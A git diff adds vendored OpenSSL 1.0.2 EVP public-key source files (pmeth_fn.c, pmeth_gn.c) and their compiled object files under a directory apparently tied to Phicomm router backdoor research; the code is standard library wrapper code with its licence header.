+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/pmeth_fn.c
@@ -0,0 +1,346 @@
+/* pmeth_fn.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2006.
+ */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include "cryptlib.h"
+#include <openssl/objects.h>
+#include <openssl/evp.h>
+#include "evp_locl.h"
+
+#define M_check_autoarg(ctx, arg, arglen, err) \
+        if (ctx->pmeth->flags & EVP_PKEY_FLAG_AUTOARGLEN) \
+                { \
+                size_t pksize = (size_t)EVP_PKEY_size(ctx->pkey); \
+                if (!arg) \
+                        { \
+                        *arglen = pksize; \
+                        return 1; \
+                        } \
+                else if (*arglen < pksize) \
+                        { \
+                        EVPerr(err, EVP_R_BUFFER_TOO_SMALL); /*ckerr_ignore*/\
+                        return 0; \
+                        } \
+                }
+
+int EVP_PKEY_sign_init(EVP_PKEY_CTX *ctx)
+{
+    int ret;
+    if (!ctx || !ctx->pmeth || !ctx->pmeth->sign) {
+        EVPerr(EVP_F_EVP_PKEY_SIGN_INIT,
+               EVP_R_OPERATION_NOT_SUPPORTED_FOR_THIS_KEYTYPE);
+        return -2;
+    }
+    ctx->operation = EVP_PKEY_OP_SIGN;
+    if (!ctx->pmeth->sign_init)
+        return 1;
+    ret = ctx->pmeth->sign_init(ctx);
+    if (ret <= 0)
+        ctx->operation = EVP_PKEY_OP_UNDEFINED;
+    return ret;
+}
+
+int EVP_PKEY_sign(EVP_PKEY_CTX *ctx,
+                  unsigned char *sig, size_t *siglen,
+                  const unsigned char *tbs, size_t tbslen)
+{
+    if (!ctx || !ctx->pmeth || !ctx->pmeth->sign) {
+        EVPerr(EVP_F_EVP_PKEY_SIGN,
+               EVP_R_OPERATION_NOT_SUPPORTED_FOR_THIS_KEYTYPE);
+        return -2;
+    }
+    if (ctx->operation != EVP_PKEY_OP_SIGN) {
+        EVPerr(EVP_F_EVP_PKEY_SIGN, EVP_R_OPERATON_NOT_INITIALIZED);
+        return -1;
+    }
+    M_check_autoarg(ctx, sig, siglen, EVP_F_EVP_PKEY_SIGN)
+        return ctx->pmeth->sign(ctx, sig, siglen, tbs, tbslen);
+}
+
+int EVP_PKEY_verify_init(EVP_PKEY_CTX *ctx)
+{
+    int ret;
+    if (!ctx || !ctx->pmeth || !ctx->pmeth->verify) {
+        EVPerr(EVP_F_EVP_PKEY_VERIFY_INIT,
+               EVP_R_OPERATION_NOT_SUPPORTED_FOR_THIS_KEYTYPE);
+        return -2;
+    }
+    ctx->operation = EVP_PKEY_OP_VERIFY;
+    if (!ctx->pmeth->verify_init)
+        return 1;
+    ret = ctx->pmeth->verify_init(ctx);
+    if (ret <= 0)
+        ctx->operation = EVP_PKEY_OP_UNDEFINED;
+    return ret;
+}
+
+int EVP_PKEY_verify(EVP_PKEY_CTX *ctx,
+                    const unsigned char *sig, size_t siglen,
+                    const unsigned char *tbs, size_t tbslen)
+{
+    if (!ctx || !ctx->pmeth || !ctx->pmeth->verify) {
+        EVPerr(EVP_F_EVP_PKEY_VERIFY,
+               EVP_R_OPERATION_NOT_SUPPORTED_FOR_THIS_KEYTYPE);
+        return -2;
+    }
+    if (ctx->operation != EVP_PKEY_OP_VERIFY) {
+        EVPerr(EVP_F_EVP_PKEY_VERIFY, EVP_R_OPERATON_NOT_INITIALIZED);
+        return -1;
+    }
+    return ctx->pmeth->verify(ctx, sig, siglen, tbs, tbslen);
+}
+
+int EVP_PKEY_verify_recover_init(EVP_PKEY_CTX *ctx)
+{
+    int ret;
+    if (!ctx || !ctx->pmeth || !ctx->pmeth->verify_recover) {
+        EVPerr(EVP_F_EVP_PKEY_VERIFY_RECOVER_INIT,
+               EVP_R_OPERATION_NOT_SUPPORTED_FOR_THIS_KEYTYPE);
+        return -2;
+    }
+    ctx->operation = EVP_PKEY_OP_VERIFYRECOVER;
+    if (!ctx->pmeth->verify_recover_init)
+        return 1;
+    ret = ctx->pmeth->verify_recover_init(ctx);
+    if (ret <= 0)
+        ctx->operation = EVP_PKEY_OP_UNDEFINED;
+    return ret;
+}
+
+int EVP_PKEY_verify_recover(EVP_PKEY_CTX *ctx,
+                            unsigned char *rout, size_t *routlen,
+                            const unsigned char *sig, size_t siglen)
+{
+    if (!ctx || !ctx->pmeth || !ctx->pmeth->verify_recover) {
+        EVPerr(EVP_F_EVP_PKEY_VERIFY_RECOVER,
+               EVP_R_OPERATION_NOT_SUPPORTED_FOR_THIS_KEYTYPE);
+        return -2;
+    }
+    if (ctx->operation != EVP_PKEY_OP_VERIFYRECOVER) {
+        EVPerr(EVP_F_EVP_PKEY_VERIFY_RECOVER, EVP_R_OPERATON_NOT_INITIALIZED);
+        return -1;
+    }
+    M_check_autoarg(ctx, rout, routlen, EVP_F_EVP_PKEY_VERIFY_RECOVER)
+        return ctx->pmeth->verify_recover(ctx, rout, routlen, sig, siglen);
+}
+
+int EVP_PKEY_encrypt_init(EVP_PKEY_CTX *ctx)
+{
+    int ret;
+    if (!ctx || !ctx->pmeth || !ctx->pmeth->encrypt) {
+        EVPerr(EVP_F_EVP_PKEY_ENCRYPT_INIT,
+               EVP_R_OPERATION_NOT_SUPPORTED_FOR_THIS_KEYTYPE);
+        return -2;
+    }
+    ctx->operation = EVP_PKEY_OP_ENCRYPT;
+    if (!ctx->pmeth->encrypt_init)
+        return 1;
+    ret = ctx->pmeth->encrypt_init(ctx);
+    if (ret <= 0)
+        ctx->operation = EVP_PKEY_OP_UNDEFINED;
+    return ret;
+}
+
+int EVP_PKEY_encrypt(EVP_PKEY_CTX *ctx,
+                     unsigned char *out, size_t *outlen,
+                     const unsigned char *in, size_t inlen)
+{
+    if (!ctx || !ctx->pmeth || !ctx->pmeth->encrypt) {
+        EVPerr(EVP_F_EVP_PKEY_ENCRYPT,
+               EVP_R_OPERATION_NOT_SUPPORTED_FOR_THIS_KEYTYPE);
+        return -2;
+    }
+    if (ctx->operation != EVP_PKEY_OP_ENCRYPT) {
+        EVPerr(EVP_F_EVP_PKEY_ENCRYPT, EVP_R_OPERATON_NOT_INITIALIZED);
+        return -1;
+    }
+    M_check_autoarg(ctx, out, outlen, EVP_F_EVP_PKEY_ENCRYPT)
+        return ctx->pmeth->encrypt(ctx, out, outlen, in, inlen);
+}
+
+int EVP_PKEY_decrypt_init(EVP_PKEY_CTX *ctx)
+{
+    int ret;
+    if (!ctx || !ctx->pmeth || !ctx->pmeth->decrypt) {
+        EVPerr(EVP_F_EVP_PKEY_DECRYPT_INIT,
+               EVP_R_OPERATION_NOT_SUPPORTED_FOR_THIS_KEYTYPE);
+        return -2;
+    }
+    ctx->operation = EVP_PKEY_OP_DECRYPT;
+    if (!ctx->pmeth->decrypt_init)
+        return 1;
+    ret = ctx->pmeth->decrypt_init(ctx);
+    if (ret <= 0)
+        ctx->operation = EVP_PKEY_OP_UNDEFINED;
+    return ret;
+}
+
+int EVP_PKEY_decrypt(EVP_PKEY_CTX *ctx,
+                     unsigned char *out, size_t *outlen,
+                     const unsigned char *in, size_t inlen)
+{
+    if (!ctx || !ctx->pmeth || !ctx->pmeth->decrypt) {
+        EVPerr(EVP_F_EVP_PKEY_DECRYPT,
+               EVP_R_OPERATION_NOT_SUPPORTED_FOR_THIS_KEYTYPE);
+        return -2;
+    }
+    if (ctx->operation != EVP_PKEY_OP_DECRYPT) {
+        EVPerr(EVP_F_EVP_PKEY_DECRYPT, EVP_R_OPERATON_NOT_INITIALIZED);
+        return -1;
+    }
+    M_check_autoarg(ctx, out, outlen, EVP_F_EVP_PKEY_DECRYPT)
+        return ctx->pmeth->decrypt(ctx, out, outlen, in, inlen);
+}
+
+int EVP_PKEY_derive_init(EVP_PKEY_CTX *ctx)
+{
+    int ret;
+    if (!ctx || !ctx->pmeth || !ctx->pmeth->derive) {
+        EVPerr(EVP_F_EVP_PKEY_DERIVE_INIT,
+               EVP_R_OPERATION_NOT_SUPPORTED_FOR_THIS_KEYTYPE);
+        return -2;
+    }
+    ctx->operation = EVP_PKEY_OP_DERIVE;
+    if (!ctx->pmeth->derive_init)
+        return 1;
+    ret = ctx->pmeth->derive_init(ctx);
+    if (ret <= 0)
+        ctx->operation = EVP_PKEY_OP_UNDEFINED;
+    return ret;
+}
+
+int EVP_PKEY_derive_set_peer(EVP_PKEY_CTX *ctx, EVP_PKEY *peer)
+{
+    int ret;
+    if (!ctx || !ctx->pmeth
+        || !(ctx->pmeth->derive || ctx->pmeth->encrypt || ctx->pmeth->decrypt)
+        || !ctx->pmeth->ctrl) {
+        EVPerr(EVP_F_EVP_PKEY_DERIVE_SET_PEER,
+               EVP_R_OPERATION_NOT_SUPPORTED_FOR_THIS_KEYTYPE);
+        return -2;
+    }
+    if (ctx->operation != EVP_PKEY_OP_DERIVE
+        && ctx->operation != EVP_PKEY_OP_ENCRYPT
+        && ctx->operation != EVP_PKEY_OP_DECRYPT) {
+        EVPerr(EVP_F_EVP_PKEY_DERIVE_SET_PEER,
+               EVP_R_OPERATON_NOT_INITIALIZED);
+        return -1;
+    }
+
+    ret = ctx->pmeth->ctrl(ctx, EVP_PKEY_CTRL_PEER_KEY, 0, peer);
+
+    if (ret <= 0)
+        return ret;
+
+    if (ret == 2)
+        return 1;
+
+    if (!ctx->pkey) {
+        EVPerr(EVP_F_EVP_PKEY_DERIVE_SET_PEER, EVP_R_NO_KEY_SET);
+        return -1;
+    }
+
+    if (ctx->pkey->type != peer->type) {
+        EVPerr(EVP_F_EVP_PKEY_DERIVE_SET_PEER, EVP_R_DIFFERENT_KEY_TYPES);
+        return -1;
+    }
+
+    /*
+     * ran@cryptocom.ru: For clarity.  The error is if parameters in peer are
+     * present (!missing) but don't match.  EVP_PKEY_cmp_parameters may return
+     * 1 (match), 0 (don't match) and -2 (comparison is not defined).  -1
+     * (different key types) is impossible here because it is checked earlier.
+     * -2 is OK for us here, as well as 1, so we can check for 0 only.
+     */
+    if (!EVP_PKEY_missing_parameters(peer) &&
+        !EVP_PKEY_cmp_parameters(ctx->pkey, peer)) {
+        EVPerr(EVP_F_EVP_PKEY_DERIVE_SET_PEER, EVP_R_DIFFERENT_PARAMETERS);
+        return -1;
+    }
+
+    if (ctx->peerkey)
+        EVP_PKEY_free(ctx->peerkey);
+    ctx->peerkey = peer;
+
+    ret = ctx->pmeth->ctrl(ctx, EVP_PKEY_CTRL_PEER_KEY, 1, peer);
+
+    if (ret <= 0) {
+        ctx->peerkey = NULL;
+        return ret;
+    }
+
+    CRYPTO_add(&peer->references, 1, CRYPTO_LOCK_EVP_PKEY);
+    return 1;
+}
+
+int EVP_PKEY_derive(EVP_PKEY_CTX *ctx, unsigned char *key, size_t *pkeylen)
+{
+    if (!ctx || !ctx->pmeth || !ctx->pmeth->derive) {
+        EVPerr(EVP_F_EVP_PKEY_DERIVE,
+               EVP_R_OPERATION_NOT_SUPPORTED_FOR_THIS_KEYTYPE);
+        return -2;
+    }
+    if (ctx->operation != EVP_PKEY_OP_DERIVE) {
+        EVPerr(EVP_F_EVP_PKEY_DERIVE, EVP_R_OPERATON_NOT_INITIALIZED);
+        return -1;
+    }
+    M_check_autoarg(ctx, key, pkeylen, EVP_F_EVP_PKEY_DERIVE)
+        return ctx->pmeth->derive(ctx, key, pkeylen);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/pmeth_fn.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/pmeth_fn.o
new file mode 100644
index 0000000000000000000000000000000000000000..4fd9e35c37e8e52b06fede74dde9adc38abd3e97
GIT binary patch
literal 6208
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/pmeth_gn.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/pmeth_gn.c
new file mode 100644
index 0000000..59f8134
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/pmeth_gn.c
@@ -0,0 +1,215 @@
+/* pmeth_gn.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2006.
+ */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include "cryptlib.h"
+#include <openssl/objects.h>
+#include <openssl/evp.h>
+#include <openssl/bn.h>
+#include "evp_locl.h"
+
+int EVP_PKEY_paramgen_init(EVP_PKEY_CTX *ctx)
+{
+    int ret;
+    if (!ctx || !ctx->pmeth || !ctx->pmeth->paramgen) {
+        EVPerr(EVP_F_EVP_PKEY_PARAMGEN_INIT,
+               EVP_R_OPERATION_NOT_SUPPORTED_FOR_THIS_KEYTYPE);
+        return -2;
+    }
+    ctx->operation = EVP_PKEY_OP_PARAMGEN;
+    if (!ctx->pmeth->paramgen_init)
+        return 1;
+    ret = ctx->pmeth->paramgen_init(ctx);
+    if (ret <= 0)
+        ctx->operation = EVP_PKEY_OP_UNDEFINED;
+    return ret;
+}
+
+int EVP_PKEY_paramgen(EVP_PKEY_CTX *ctx, EVP_PKEY **ppkey)
+{
+    int ret;
+    if (!ctx || !ctx->pmeth || !ctx->pmeth->paramgen) {
+        EVPerr(EVP_F_EVP_PKEY_PARAMGEN,
+               EVP_R_OPERATION_NOT_SUPPORTED_FOR_THIS_KEYTYPE);
+        return -2;
+    }
+
+    if (ctx->operation != EVP_PKEY_OP_PARAMGEN) {
+        EVPerr(EVP_F_EVP_PKEY_PARAMGEN, EVP_R_OPERATON_NOT_INITIALIZED);
+        return -1;
+    }
+
+    if (!ppkey)
+        return -1;
+
+    if (!*ppkey)
+        *ppkey = EVP_PKEY_new();
+
+    ret = ctx->pmeth->paramgen(ctx, *ppkey);
+    if (ret <= 0) {
+        EVP_PKEY_free(*ppkey);
+        *ppkey = NULL;
+    }
+    return ret;
+}
+
+int EVP_PKEY_keygen_init(EVP_PKEY_CTX *ctx)
+{
+    int ret;
+    if (!ctx || !ctx->pmeth || !ctx->pmeth->keygen) {
+        EVPerr(EVP_F_EVP_PKEY_KEYGEN_INIT,
+               EVP_R_OPERATION_NOT_SUPPORTED_FOR_THIS_KEYTYPE);
+        return -2;
+    }
+    ctx->operation = EVP_PKEY_OP_KEYGEN;
+    if (!ctx->pmeth->keygen_init)
+        return 1;
+    ret = ctx->pmeth->keygen_init(ctx);
+    if (ret <= 0)
+        ctx->operation = EVP_PKEY_OP_UNDEFINED;
+    return ret;
+}
+
+int EVP_PKEY_keygen(EVP_PKEY_CTX *ctx, EVP_PKEY **ppkey)
+{
+    int ret;
+
+    if (!ctx || !ctx->pmeth || !ctx->pmeth->keygen) {
+        EVPerr(EVP_F_EVP_PKEY_KEYGEN,
+               EVP_R_OPERATION_NOT_SUPPORTED_FOR_THIS_KEYTYPE);
+        return -2;
+    }
+    if (ctx->operation != EVP_PKEY_OP_KEYGEN) {
+        EVPerr(EVP_F_EVP_PKEY_KEYGEN, EVP_R_OPERATON_NOT_INITIALIZED);
+        return -1;
+    }
+
+    if (!ppkey)
+        return -1;
+
+    if (!*ppkey)
+        *ppkey = EVP_PKEY_new();
+
+    ret = ctx->pmeth->keygen(ctx, *ppkey);
+    if (ret <= 0) {
+        EVP_PKEY_free(*ppkey);
+        *ppkey = NULL;
+    }
+    return ret;
+}
+
+void EVP_PKEY_CTX_set_cb(EVP_PKEY_CTX *ctx, EVP_PKEY_gen_cb *cb)
+{
+    ctx->pkey_gencb = cb;
+}
+
+EVP_PKEY_gen_cb *EVP_PKEY_CTX_get_cb(EVP_PKEY_CTX *ctx)
+{
+    return ctx->pkey_gencb;
+}
+
+/*
+ * "translation callback" to call EVP_PKEY_CTX callbacks using BN_GENCB style
+ * callbacks.
+ */
+
+static int trans_cb(int a, int b, BN_GENCB *gcb)
+{
+    EVP_PKEY_CTX *ctx = gcb->arg;
+    ctx->keygen_info[0] = a;
+    ctx->keygen_info[1] = b;
+    return ctx->pkey_gencb(ctx);
+}
+
+void evp_pkey_set_cb_translate(BN_GENCB *cb, EVP_PKEY_CTX *ctx)
+{
+    BN_GENCB_set(cb, trans_cb, ctx)
+}
+
+int EVP_PKEY_CTX_get_keygen_info(EVP_PKEY_CTX *ctx, int idx)
+{
+    if (idx == -1)
+        return ctx->keygen_info_count;
+    if (idx < 0 || idx > ctx->keygen_info_count)
+        return 0;
+    return ctx->keygen_info[idx];
+}
+
+EVP_PKEY *EVP_PKEY_new_mac_key(int type, ENGINE *e,
+                               const unsigned char *key, int keylen)
+{
+    EVP_PKEY_CTX *mac_ctx = NULL;
+    EVP_PKEY *mac_key = NULL;
+    mac_ctx = EVP_PKEY_CTX_new_id(type, e);
+    if (!mac_ctx)
+        return NULL;
+    if (EVP_PKEY_keygen_init(mac_ctx) <= 0)
+        goto merr;
+    if (EVP_PKEY_CTX_ctrl(mac_ctx, -1, EVP_PKEY_OP_KEYGEN,
+                          EVP_PKEY_CTRL_SET_MAC_KEY,
+                          keylen, (void *)key) <= 0)
+        goto merr;
+    if (EVP_PKEY_keygen(mac_ctx, &mac_key) <= 0)
+        goto merr;
+ merr:
+    if (mac_ctx)
+        EVP_PKEY_CTX_free(mac_ctx);
+    return mac_key;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/pmeth_gn.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/pmeth_gn.o
new file mode 100644
index 0000000000000000000000000000000000000000..fe3a24ce50a4d86628286d8c1ea5c434d7b38e04
GIT binary patch
literal 3800
zcmbuCZD?Cn7=TZc)Yh#_v!brLF)vz2o!cd`1-m&%(>BeihAs3%r`xzq)7uZ)rXjhp
z?U?HzWcG3=h|aIS`e%q=zhn-bfez{iNEr(L5b=lTr2d!`%Fx;C``&v_b8~tF8y>hh
z=RD{Ay63!kPck2gb$hC+2ya#7Fe%MACFJd`rE$A8Y$w}D9a*j4{dZWuNsUvr)QGls
z=|oTa%+WUFeY9X|4b-Ti`aiT#)M{vcwwdIlNT?Y4`tqA#<;olI@#S6caUE@5S~pE|
z<soXsrKPCkL4vW+!ZmH1d96^KuUYDp0FdL0w*CB{0rXLiKHME#0BO;|M1EfKXuIt&
z-U5Lu<x=^t%#|qBSD~kcHSG}1A11j5s-JGEwZfzZjHvEKuSSa*Z-&TrP~%Cxiwi7y
zF-imGG=DX~qusn4ZRNZ1x=XOQ8$s9&AFSQ^ZU_!ub8&#X;VavXa;ZDrjkep`4XV$y
zS%(N&!v?QZfBdg$F4f?<!!qn}G+>G3*Ug;Ih|<MSv9LB<e_)25-h#<SlWT_W6H6rA
zKS1>#`t)xpq{J{ae2+9+R^S9eMY`l`f|;FTJ^EEll@6*eS%+CDp4prK&g{|u2<tz7
zhN*ZNw>qZ(&X>1R{Wm_{=#8c(isw5_TWnuiwVfMq-ZA}`<0r!>7D=?T^Pto`FqBJa
zIq87hA_w<}p2%6#(3!`Ba<KJL8xw*)1MpPC6Fo9OU=xbStVDwT9(b@-o$4i3vw^Ce
zbv3oG!j}Vec3CTgG&=eq8xLY1@dxrA&kO!qTQ<hlKH6C8@=Kog{DH8)7Hv$j^}&tx
zlI{XqbJN9GF0%EzS&!^<7q-mU0}i=g+4y1B<2&4B<9D#{_6N>;!v4l{UI;kv>-Gmd
zXZ=!_zcK6&bl}@nZdgZr<S)}r!s}Y`aPRr<muq>g(<*0mF!ea>@UuWEFTu3h+`Ob_
zGX&x#?yustvZGw(UYIt3U+!;^E$@RK_g-ur0Ni*SINF(I3fB3;c&LK>bOrtraI~|B
